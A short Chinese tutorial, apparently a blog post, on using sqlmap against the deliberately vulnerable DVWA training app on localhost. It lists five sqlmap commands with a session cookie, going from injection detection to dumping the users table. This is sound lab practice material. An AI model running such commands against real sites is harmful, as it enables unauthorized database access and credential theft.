dvwa-sql注入-sqlmap用法

1.检测漏洞:

python sqlmap.py -u "http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=bf6430jbisgcmnv31km4vlurud; security=low"

其中cookie在f12-network-刷新-headers里面

dvwa-sql注入-sqlmap用法_第1张图片

2.获取数据库

python sqlmap.py -u "http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=bf6430jbisgcmnv31km4vlurud; security=low" --dbs

dvwa-sql注入-sqlmap用法_第2张图片

3.获取指定数据库表

python sqlmap.py -u "http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=bf6430jbisgcmnv31km4vlurud; security=low" -D dvwa --tables

4.获取指定表项:

 python sqlmap.py -u "http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=bf6430jbisgcmnv31km4vlurud; security=low" -D dvwa -T users --columns

 dvwa-sql注入-sqlmap用法_第3张图片

5.获取数据:

 python sqlmap.py -u "http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=bf6430jbisgcmnv31km4vlurud; security=low" -D dvwa -T users --dump

dvwa-sql注入-sqlmap用法_第4张图片

 

你可能感兴趣的:(sql,安全,数据库)